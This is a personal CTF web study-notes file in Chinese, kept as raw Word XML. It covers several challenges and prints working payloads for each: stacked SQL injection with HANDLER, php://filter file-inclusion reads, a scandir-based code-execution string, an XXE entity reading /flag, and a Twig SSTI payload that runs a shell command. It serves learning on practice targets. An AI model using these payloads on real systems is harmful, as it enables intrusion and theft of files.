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CTF:web学习笔记：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[GYCTF2020]Blacklist</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1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0000"/>
          <w:spacing w:val="0"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>黑名单：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="0"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="0"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="0"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject);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0000"/>
          <w:spacing w:val="0"/>
          <w:u w:val="single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知识点；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>handler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> （sql专用语句）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介绍：handler语句，一行一行的浏览一个表中的数据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handler语句并不具备select语句的所有功能。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mysql专用的语句，并没有包含到SQL标准中。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HANDLER语句提供通往表的直接通道的存储引擎接口，可以用于MyISAM和InnoDB表。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知识点2：堆叠注入，因select被禁用，尝试堆叠注入（具体看代码与联合注入对比）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>过程：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>-1' ; show tables; --+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-1' ; handler FlagHere open ; handler FlagHere read first ; handler FlagHere close ; --+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0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————————————————————————————————————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PHP伪协议：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../</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI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RF11.php?filename=php://filter/convert.base64-encode/resource=RF11.php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以base64编码出RF11.php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———————————————————————————————————————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[GXYCTF2019]禁止套娃1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267325" cy="2256155"/>
            <wp:effectExtent l="0" t="0" r="571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"http://t.csdn.cn/mHhJh"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http://t.csdn.cn/mHhJh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WP  （对不起，没看懂）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思路：页面源码和抓包，目录扫描都没有任何结果，PHP伪协议也被过滤，用工具扒下了他的源码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附图：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="3509010"/>
            <wp:effectExtent l="0" t="0" r="635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进行代码审计：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最终payload：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/?exp=highlight_file(next(array_reverse(scandir(pos(localeconv())))));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———————————————————————————————————————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[BSidesCF 2020]Had a bad day1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（wp）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271770" cy="2521585"/>
            <wp:effectExtent l="0" t="0" r="1270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这里以为是sql注入，试了试</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267960" cy="1209040"/>
            <wp:effectExtent l="0" t="0" r="5080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原来是文件包含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使用php伪协议：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php://filter/convert.base64-encode/resource=index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（尝试多次，要把.php去掉）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5262245" cy="1995170"/>
            <wp:effectExtent l="0" t="0" r="10795" b="12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解码：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267325" cy="1188720"/>
            <wp:effectExtent l="0" t="0" r="571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最有用的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val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>重新构造payload：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php://filter/convert.base64-encode/index/resource=flag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得到，解码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5067300" cy="2762250"/>
            <wp:effectExtent l="0" t="0" r="7620" b="1143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[NCTF2019]Fake XML cookbook</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">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题如其名，xxe注入（完全不会，自己搜来学吧）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="2803525"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6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Payload：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?&gt;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feng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&lt;!ENTITY file SYSTEM  "file:///flag"&gt;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&lt;user&gt;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&lt;username&gt;&amp;file;&lt;/username&gt;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&lt;password&gt;1&lt;/password&gt;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&lt;/user&gt;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抓包来，把最下面换成这个payload就可以出来了。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[BJDCTF2020]Cookie is so stable 1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忘截图了，不过没事，我不会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看这个吧，https://www.cnblogs.com/upfine/p/16534494.html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还有这个：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"http://t.csdn.cn/tHOEz"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http://t.csdn.cn/tHOEz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Payload：{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}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知识点：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>twig注入，属于SSTI中的一种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流量分析，内存</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>取证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0NTY0MDYzMGY3NmRkZDNjOTk3ZDAxYjI3MDRhYzEifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="005705E8"/>
    <w:rsid w:val="15A1271E"/>
    <w:rsid w:val="248A2BCB"/>
    <w:rsid w:val="32CE6DA7"/>
    <w:rsid w:val="3DAA2019"/>
    <w:rsid w:val="601467D3"/>
    <w:rsid w:val="60C74937"/>
    <w:rsid w:val="7A25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558</Words>
  <Characters>1473</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>266</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1526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2023-03-15T06:37:00Z</dcterms:created>
  <dc:creator>86132</dc:creator>
  <cp:lastModifiedBy>羽小洛</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-03-20T08:10:20Z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02DED37CAFEF451AB939963EC0C0197C</vt:lpwstr>
  </property>
</Properties>
</file>